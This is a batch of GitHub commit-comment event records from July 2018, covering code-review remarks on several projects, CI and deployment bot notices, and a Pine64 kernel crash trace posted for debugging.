{"id":"8045938509","type":"CommitCommentEvent","actor":{"login":"dnoe"},"repo":{"name":"envoyproxy/envoy"},"payload":{"comment":{"id":29909469,"position":4,"line":52,"path":"test/common/network/addr_family_aware_socket_option_impl_test.cc","commit_id":"b27068bd065a83f9c106a08d3fa66a19593ce321","created_at":"2018-07-31T18:40:19Z","updated_at":"2018-07-31T18:40:19Z","author_association":"CONTRIBUTOR","body":"How does the mock os_sys_calls_ reach the call to address.socket() here? I am having a problem with these expectations not being met when I run this test internally at Google, along with the equivalent new expectations added below in listener_manager_impl_test.cc. It looks like the flow here is that the call to address.socket() on line 55 will result in a call to InstanceBase::socketFromSocketType(), which uses ::socket() to obtain a socket, without doing anything to obtain the os_sys_calls_ mock. So I don't see how it could have worked, but clearly it passed through CI and also does so when I run the test manually with bazel. Am I missing some magic here?\r\n\r\n@ramaraochavali any thoughts?"}},"created_at":"2018-07-31T18:40:19Z"}
{"id":"8045939338","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29909471,"position":null,"line":null,"path":null,"commit_id":"715f6a5cba31ff3a36c8d3a7bfe217cd02868b6d","created_at":"2018-07-31T18:40:29Z","updated_at":"2018-07-31T18:40:29Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#pr-2](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#pr-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T18:40:29Z"}
{"id":"8045939652","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909472,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-31T18:40:33Z","updated_at":"2018-07-31T18:40:33Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-31T18:40:33Z"}
{"id":"8045941312","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909480,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-31T18:40:50Z","updated_at":"2018-07-31T18:40:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:40:50Z"}
{"id":"8045943572","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909492,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-31T18:41:16Z","updated_at":"2018-07-31T18:41:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:41:16Z"}
{"id":"8045947786","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909500,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-31T18:42:02Z","updated_at":"2018-07-31T18:42:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:42:02Z"}
{"id":"8045949968","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909503,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-31T18:42:26Z","updated_at":"2018-07-31T18:42:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:42:26Z"}
{"id":"8045953558","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29909509,"position":null,"line":null,"path":null,"commit_id":"7e6277ca3ba602eb5a07735b78f11b85a68177e5","created_at":"2018-07-31T18:43:06Z","updated_at":"2018-07-31T18:43:06Z","author_association":"CONTRIBUTOR","body":"Ok ! I got the crash with the spi-flash enabled, but it seem that it is intermittent since another reboot worked .\r\n\r\nHere is the crash : \r\n\r\nStarting kernel ...\r\n\r\n[    0.819639] Internal error: Oops - BUG: 0 [#1] SMP\r\n[    0.824436] Modules linked in:\r\n[    0.827494] CPU: 2 PID: 33 Comm: kworker/2:1 Tainted: G        W         4.17.11-sunxi64 #14\r\n[    0.835923] Hardware name: Pine64+ (DT)\r\n[    0.839759] Workqueue: events deferred_probe_work_func\r\n[    0.844896] pstate: 60000005 (nZCv daif -PAN -UAO)\r\n[    0.849688] pc : sysfs_create_file_ns+0x34/0x38\r\n[    0.854216] lr : sysfs_create_files+0x40/0xb0\r\n[    0.858568] sp : ffff0000092137c0\r\n[    0.861879] x29: ffff0000092137c0 x28: 0000000000000000 \r\n[    0.867189] x27: 0000000000000000 x26: ffff000008d8bcb0 \r\n[    0.872498] x25: 0000000000000003 x24: ffff800073d51820 \r\n[    0.877809] x23: ffff000008d8bc90 x22: ffff800073d531a0 \r\n[    0.883118] x21: ffff000008d8bcc0 x20: ffff800073d72160 \r\n[    0.888428] x19: 0000000000000000 x18: 0000000000008000 \r\n[    0.893737] x17: ffff0000089e8f60 x16: 00000000ffffff80 \r\n[    0.899045] x15: 00000000fffffff0 x14: ffff000008d321a8 \r\n[    0.904354] x13: ffff000008dd646a x12: ffff000008d32000 \r\n[    0.909663] x11: 0000000000000000 x10: ffff000008dd5000 \r\n[    0.914973] x9 : 0000000000000000 x8 : 0000000000000001 \r\n[    0.920282] x7 : 0000000000000000 x6 : 0000000000000104 \r\n[    0.925590] x5 : 0000000000000001 x4 : 0000000000000000 \r\n[    0.930899] x3 : ffff8000750eb600 x2 : 0000000000000000 \r\n[    0.936209] x1 : ffff000008d8bcd0 x0 : 0000000000000000 \r\n[    0.941523] Process kworker/2:1 (pid: 33, stack limit = 0x        (ptrval))\r\n[    0.948478] Call trace:\r\n[    0.950926]  sysfs_create_file_ns+0x34/0x38\r\n[    0.955107]  sysfs_create_files+0x40/0xb0\r\n[    0.959117]  mtd_add_partition_attrs+0x20/0x50\r\n[    0.963561]  add_mtd_partitions+0x9c/0x168\r\n[    0.967657]  mtd_device_parse_register+0x68/0x178\r\n[    0.972359]  m25p_probe+0xfc/0x1a8\r\n[    0.975761]  spi_drv_probe+0x78/0xc8\r\n[    0.979337]  driver_probe_device+0x21c/0x2f8\r\n[    0.983606]  __device_attach_driver+0x98/0xf0\r\n[    0.987962]  bus_for_each_drv+0x48/0x98\r\n[    0.991796]  __device_attach+0xc0/0x130\r\n[    0.995631]  device_initial_probe+0x10/0x18\r\n[    0.999813]  bus_probe_device+0x90/0x98\r\n[    1.003648]  device_add+0x3ac/0x5b0\r\n[    1.007138]  spi_add_device+0xf4/0x160\r\n[    1.010887]  of_register_spi_device+0x1c4/0x348\r\n[    1.015417]  spi_register_controller+0x198/0x5b8\r\n[    1.020034]  devm_spi_register_controller+0x48/0xa0\r\n[    1.024910]  sun6i_spi_probe+0x1d8/0x2f0\r\n[    1.028832]  platform_drv_probe+0x58/0xb8\r\n[    1.032841]  driver_probe_device+0x21c/0x2f8\r\n[    1.037110]  __device_attach_driver+0x98/0xf0\r\n[    1.041464]  bus_for_each_drv+0x48/0x98\r\n[    1.045299]  __device_attach+0xc0/0x130\r\n[    1.049134]  device_initial_probe+0x10/0x18\r\n[    1.053315]  bus_probe_device+0x90/0x98\r\n[    1.057151]  deferred_probe_work_func+0xa4/0x148\r\n[    1.061768]  process_one_work+0x1d4/0x328\r\n[    1.065778]  worker_thread+0x248/0x488\r\n[    1.069526]  kthread+0x128/0x130\r\n[    1.072755]  ret_from_fork+0x10/0x18\r\n[    1.076331] Code: 52800002 97ffff94 a8c17bfd d65f03c0 (d4210000) \r\n[    1.082421] ---[ end trace 706ae72ec807659a ]---\r\n\r\n"}},"created_at":"2018-07-31T18:43:06Z"}
{"id":"8045953801","type":"CommitCommentEvent","actor":{"login":"smrgeoinfo"},"repo":{"name":"CINERGI/geoportal-server-catalog"},"payload":{"comment":{"id":29909512,"position":null,"line":null,"path":null,"commit_id":"924ed6b6727c2e4a762d8ada68ea21ade68b82c3","created_at":"2018-07-31T18:43:09Z","updated_at":"2018-07-31T18:43:09Z","author_association":"NONE","body":"dave-- does this pr fix the 'toKnownXslt' problem, or do I need to get the exslt:dateTime functions out of hte xslt?"}},"created_at":"2018-07-31T18:43:09Z"}
{"id":"8045954331","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29909514,"position":43,"line":420,"path":"source/gameengine/Ketsji/KX_Mesh.cpp","commit_id":"59d33db590c41d98e8b04d17c80d2f3e355d8d62","created_at":"2018-07-31T18:43:15Z","updated_at":"2018-07-31T18:43:15Z","author_association":"COLLABORATOR","body":"@panzerga there is to use BLI_compiler_compat.h"}},"created_at":"2018-07-31T18:43:15Z"}
{"id":"8045954591","type":"CommitCommentEvent","actor":{"login":"ryanml"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":29909516,"position":null,"line":null,"path":null,"commit_id":"b85dfa16ae78413d47b0ef76fd2e5971b2a5f44b","created_at":"2018-07-31T18:43:18Z","updated_at":"2018-07-31T18:43:18Z","author_association":"MEMBER","body":"Thanks for this one 👍"}},"created_at":"2018-07-31T18:43:18Z"}
{"id":"8045955483","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29909520,"position":6,"line":38,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/station.rb","commit_id":"5b6fc488ad6655b432926d822580934bb8599c32","created_at":"2018-07-31T18:43:28Z","updated_at":"2018-07-31T18:43:28Z","author_association":"NONE","body":"Исправил, но не там. Тут было верное название метода. Смотри, у станции есть поезда. И значит станция может перебирать поезда. А у поезда, есть вагоны, и это значит, что поезд может перебирать свои вагоны. Сейчас у тебя в классе станции определен метод по перебору вагонов. И замечу, что тело метода написано верно. То есть внутри метода ты делаешь верную операцию, но назвал метод не правильно"}},"created_at":"2018-07-31T18:43:28Z"}
{"id":"8045956394","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909522,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-31T18:43:38Z","updated_at":"2018-07-31T18:43:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:43:38Z"}
{"id":"8045956656","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"HybridDog/simple_robots"},"payload":{"comment":{"id":29909524,"position":null,"line":null,"path":null,"commit_id":"114df74f1981adaccb9e8c80e819b97da5f1e7ea","created_at":"2018-07-31T18:43:40Z","updated_at":"2018-07-31T18:43:40Z","author_association":"OWNER","body":"If I put information somewhere and somebody analyses it, I get tempted to input him/her with even more information, sorry for taking your time."}},"created_at":"2018-07-31T18:43:40Z"}
{"id":"8045957142","type":"CommitCommentEvent","actor":{"login":"eguendelman"},"repo":{"name":"felixfrank/flatbuffers"},"payload":{"comment":{"id":29909531,"position":25,"line":455,"path":"python/flatbuffers/builder.py","commit_id":"ef94e2410dd0155b52574deb6a577c8c73e92075","created_at":"2018-07-31T18:43:46Z","updated_at":"2018-07-31T18:43:46Z","author_association":"NONE","body":"With a bit more testing I discovered that the difference is in the version of python.  I was on 2.7 and it failed as I reported above; but in python3.5 they do indeed return the same thing."}},"created_at":"2018-07-31T18:43:46Z"}
{"id":"8045961163","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909553,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-31T18:44:29Z","updated_at":"2018-07-31T18:44:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:44:29Z"}
{"id":"8045962710","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29909557,"position":6,"line":4,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/passenger_wagon.rb","commit_id":"5b6fc488ad6655b432926d822580934bb8599c32","created_at":"2018-07-31T18:44:46Z","updated_at":"2018-07-31T18:44:46Z","author_association":"NONE","body":"volume с е в конце. Поправь и в остальных местах"}},"created_at":"2018-07-31T18:44:46Z"}
{"id":"8045967360","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29909574,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-31T18:45:39Z","updated_at":"2018-07-31T18:45:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T18:45:39Z"}
{"id":"8045968141","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909577,"position":64,"line":59,"path":"Lesson3/train.rb","commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:45:47Z","updated_at":"2018-07-31T18:45:47Z","author_association":"NONE","body":"по этому коду замечания аналогичные предыдущему:\r\n- лучше сделать проверку более читаемой\r\n- надо избавиться от переменной \"каррент стейшен\" в пользу метода\r\n- не нужно в 63 строке дублировать код из метода \"каррент стейшен\"\r\n- 64 строка лишняя"}},"created_at":"2018-07-31T18:45:47Z"}
{"id":"8045970073","type":"CommitCommentEvent","actor":{"login":"konsajoncy"},"repo":{"name":"konsajoncy/tempviabrowser"},"payload":{"comment":{"id":29909584,"position":null,"line":null,"path":null,"commit_id":"509e18d6bb5268628a77ac0f8680a95f4a27eb9a","created_at":"2018-07-31T18:46:08Z","updated_at":"2018-07-31T18:46:08Z","author_association":"OWNER","body":"f"}},"created_at":"2018-07-31T18:46:08Z"}
{"id":"8045970559","type":"CommitCommentEvent","actor":{"login":"theSarahRu"},"repo":{"name":"theSarahRu/Transcribe"},"payload":{"comment":{"id":29909589,"position":null,"line":null,"path":null,"commit_id":"db1be249b53cd8d5d2bd933a7538522bbdca8bcd","created_at":"2018-07-31T18:46:13Z","updated_at":"2018-07-31T18:46:13Z","author_association":"OWNER","body":"Add Russian localization"}},"created_at":"2018-07-31T18:46:13Z"}
{"id":"8045971667","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29909591,"position":null,"line":null,"path":null,"commit_id":"13f662f05d3d5230aeeb6a3608079efeed6d034b","created_at":"2018-07-31T18:46:26Z","updated_at":"2018-07-31T18:46:26Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-60](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-60).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-60-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-31T18:46:26Z"}
{"id":"8045977622","type":"CommitCommentEvent","actor":{"login":"thinkseven"},"repo":{"name":"thinkseven/reactnd-redux-todos-goals"},"payload":{"comment":{"id":29909604,"position":null,"line":null,"path":null,"commit_id":"d156e336c94d13f00e591a71055eb6b6ae634248","created_at":"2018-07-31T18:47:31Z","updated_at":"2018-07-31T18:47:31Z","author_association":"OWNER","body":"https://github.com/reduxjs/react-redux\r\nhttps://redux.js.org/basics/usagewithreact\r\nhttps://github.com/reduxjs/react-redux/blob/master/docs/api.md\r\n\r\nSummary\r\nReact often leverages Redux for more predictable state management via the react-redux bindings. These bindings give us an API that simplifies the most common interactions between React and Redux.\r\n\r\nProvider makes it possible for Redux to pass data from the store to any React components that need it. It uses React’s context feature to make this work.\r\n\r\nconnect() connects a React component to the Redux store. The mapStateToProps() function allows us to specify which state from the store you want passed to your React component, while the mapDispatchToProps() function allows us to bind dispatch to action creators before they ever hit the component."}},"created_at":"2018-07-31T18:47:31Z"}
{"id":"8045978086","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29909606,"position":5,"line":99,"path":"src/main/java/ml/duncte123/skybot/SkyBot.java","commit_id":"ac7610062ec792de66e33de19d1264e3e24c9a94","created_at":"2018-07-31T18:47:36Z","updated_at":"2018-07-31T18:47:36Z","author_association":"MEMBER","body":"TOKENU?\r\n"}},"created_at":"2018-07-31T18:47:36Z"}
{"id":"8045980003","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"susucoin-project/susucoin"},"payload":{"comment":{"id":29909608,"position":160,"line":229,"path":"src/chainparams.cpp","commit_id":"98e0e7db196d42b06c5369ec4415c5e75eec56cf","created_at":"2018-07-31T18:47:57Z","updated_at":"2018-07-31T18:47:57Z","author_association":"NONE","body":"nice commit! i wonder to know whats the `tutu`? 😅"}},"created_at":"2018-07-31T18:47:57Z"}
{"id":"8045980931","type":"CommitCommentEvent","actor":{"login":"edwardoliveira"},"repo":{"name":"interlegis/sapl"},"payload":{"comment":{"id":29909611,"position":5,"line":52,"path":"sapl/redireciona_urls/urls.py","commit_id":"cb274d08b1de4f24fca172b6dab74989d4123da1","created_at":"2018-07-31T18:48:08Z","updated_at":"2018-07-31T18:48:08Z","author_association":"CONTRIBUTOR","body":"@eliseuegewarth Vc chegou a verificar se não existe nenhum lugar onde a referência a esta URL seja feita diretamente ao invés de pelo nome lógico? Alguma página HTML ou código JavaScript."}},"created_at":"2018-07-31T18:48:08Z"}
{"id":"8045985781","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909625,"position":30,"line":36,"path":"Lesson3/train.rb","commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:48:58Z","updated_at":"2018-07-31T18:48:58Z","author_association":"NONE","body":"либо после него нужно что-то дописать )\r\n"}},"created_at":"2018-07-31T18:48:58Z"}
{"id":"8045986503","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909628,"position":null,"line":null,"path":null,"commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:49:08Z","updated_at":"2018-07-31T18:49:08Z","author_association":"NONE","body":"я бы еще рекомендовал пункт ТЗ для класса Роут: \"Имеет начальную и конечную станцию\" реализовать в виде отдельных методов, возвращающих эти самые станции\r\n"}},"created_at":"2018-07-31T18:49:08Z"}
{"id":"8045990120","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"susucoin-project/susucoin"},"payload":{"comment":{"id":29909642,"position":213,"line":330,"path":"src/chainparams.cpp","commit_id":"98e0e7db196d42b06c5369ec4415c5e75eec56cf","created_at":"2018-07-31T18:49:44Z","updated_at":"2018-07-31T18:49:44Z","author_association":"NONE","body":"ruru is a kind of girls name? 🤔"}},"created_at":"2018-07-31T18:49:44Z"}
{"id":"8045994520","type":"CommitCommentEvent","actor":{"login":"migtoledo"},"repo":{"name":"migtoledo/Start"},"payload":{"comment":{"id":29909659,"position":null,"line":null,"path":null,"commit_id":"af6632a14485620b2a0ad4038f5ae19dc8226297","created_at":"2018-07-31T18:50:33Z","updated_at":"2018-07-31T18:50:33Z","author_association":"OWNER","body":"Main Project Description"}},"created_at":"2018-07-31T18:50:33Z"}
{"id":"8045996297","type":"CommitCommentEvent","actor":{"login":"FernandoGurgel"},"repo":{"name":"UEA-dspace/dspace"},"payload":{"comment":{"id":29909660,"position":null,"line":null,"path":null,"commit_id":"9e6acc0c7652b0d43000464d0e9442691938ad4c","created_at":"2018-07-31T18:50:53Z","updated_at":"2018-07-31T18:50:53Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Configura tamanho para logos rodapé sem sobrepor](https://trello.com/c/2SGM7u1B/39-configura-tamanho-para-logos-rodap%C3%A9-sem-sobrepor)"}},"created_at":"2018-07-31T18:50:53Z"}
{"id":"8045998797","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909662,"position":null,"line":null,"path":null,"commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:51:22Z","updated_at":"2018-07-31T18:51:22Z","author_association":"NONE","body":"если так сделать, то проверки в методах \"следующая станция\" и \"предыдущая станция\" можно будет записать более наглядно\r\nпримерно так:\r\n```ruby\r\n... if current_station != route.last_station\r\n```\r\nну или с `unless`:\r\n```ruby\r\n... unless current_station == route.last_station\r\n```"}},"created_at":"2018-07-31T18:51:22Z"}
{"id":"8045999699","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29909666,"position":null,"line":null,"path":null,"commit_id":"1d72d6ce114e282bea2ba92410d0a280d8a85c39","created_at":"2018-07-31T18:51:32Z","updated_at":"2018-07-31T18:51:32Z","author_association":"OWNER","body":"Hmm, the printer should deal with precedence correctly. Because + and * are associative, the above 'simplifications' should be valid for both.  So if there is a bug in printing of *, I would like to see an example [so that I can fix it!].\r\n\r\nIt definitely feels like this change is going in the wrong direction.  [Note that I like your explanation and your reasoning.  Following them, you made a logical change.  However, the issue is that part of reasoning relies on treating what is a bug as a feature, or at least that's my impression.]"}},"created_at":"2018-07-31T18:51:32Z"}
{"id":"8046001794","type":"CommitCommentEvent","actor":{"login":"valentinedwv"},"repo":{"name":"CINERGI/geoportal-server-catalog"},"payload":{"comment":{"id":29909678,"position":null,"line":null,"path":null,"commit_id":"924ed6b6727c2e4a762d8ada68ea21ade68b82c3","created_at":"2018-07-31T18:51:55Z","updated_at":"2018-07-31T18:51:55Z","author_association":"MEMBER","body":"yes, but not sure how secure it is."}},"created_at":"2018-07-31T18:51:55Z"}
{"id":"8046004977","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29909686,"position":null,"line":null,"path":null,"commit_id":"13f662f05d3d5230aeeb6a3608079efeed6d034b","created_at":"2018-07-31T18:52:33Z","updated_at":"2018-07-31T18:52:33Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-61](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-61).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-61-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-31T18:52:33Z"}
{"id":"8046009932","type":"CommitCommentEvent","actor":{"login":"prabusubra"},"repo":{"name":"prabusubra/blueprint-app"},"payload":{"comment":{"id":29909697,"position":null,"line":null,"path":null,"commit_id":"890b510543458627372fea4568dfdc84683995f5","created_at":"2018-07-31T18:53:28Z","updated_at":"2018-07-31T18:53:28Z","author_association":"OWNER","body":"updated the button dynamically"}},"created_at":"2018-07-31T18:53:28Z"}
{"id":"8046012641","type":"CommitCommentEvent","actor":{"login":"joe704la"},"repo":{"name":"aspnetboilerplate/aspnetboilerplate"},"payload":{"comment":{"id":29909703,"position":null,"line":null,"path":null,"commit_id":"59237945c7b75cedcaf8be5467de78b5116ae75a","created_at":"2018-07-31T18:54:00Z","updated_at":"2018-07-31T18:54:00Z","author_association":"NONE","body":"Thank you"}},"created_at":"2018-07-31T18:54:00Z"}
